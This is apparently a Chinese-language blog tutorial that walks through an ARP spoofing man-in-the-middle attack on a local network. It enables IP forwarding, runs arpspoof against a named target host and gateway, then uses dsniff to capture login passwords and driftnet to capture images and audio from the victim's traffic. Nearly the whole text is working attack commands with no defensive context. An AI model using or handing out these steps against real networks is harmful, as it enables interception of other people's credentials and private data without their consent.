说明:阅读这篇博客并进行实际操作,需要对arp攻击过程有一定的了解。如果对此过程不了解的小伙伴可以先阅读这篇博客进行了解:arp欺骗攻击的全面讲解
一、进行arp攻击
首先,要进行嗅探操作,需要先对目标机器进行arp欺骗攻击。在上面引用的博客(arp欺骗攻击的全面讲解)中我们提到,arp攻击会让目标机器断网,但是我们这次要进行嗅探操作,是不能让目标机器断网的,所以需要进行转发代理操作。
命令行输入 cat /proc/sys/net/ipv4/ip_forward
即可查看当前转发状态,如果输出结果是 0
那么不转发则让目标机器断网。如果输出结果是 1
那么进行转发,也就是不让目标机器断网。
如果你输出的是 0
那么就可以输入 echo 1 > /proc/sys/net/ipv4/ip_forward
对转发状态进行修改,修改完后再输入 cat /proc/sys/net/ipv4/ip_forward
,如果此时输出的是 1
那么就可以进行下面的arp攻击操作了。
输入 arpspoof -i eth0 -t 192.168.16.20 -r 192.168.16.254
,即可开始拦截并转发来自192.168.16.20
机器向外发送数据包和外界发给他的数据包(也叫双向欺骗)。注意:此时,这台机器是没有断网的。
二、使用dsniff 进行密码嗅探
命令行输入 dsniff -i eth0 -m
即可开始密码嗅探。这个时候,我们登录4399,命令行能够看到刚才发送的请求。
三、使用driftnet进行图片嗅探
在 kali
系统上,我们可以借助工具 driftnet
对转发的数据包进行分析,分析出里面的相关密码,进行输出。如果未找到命令则需要先进行安装 apt-get install driftnet
命令行输入 driftnet -i eth0 -a -d img -s
即可开始图片嗅探。
-a 将抓取到的图片其保存到一个目录中,并在控制台输出名称。
-d 指定目录
-s 抓取声音
这个时候,我们就可以在 img
目录下看到截取到的相关图片。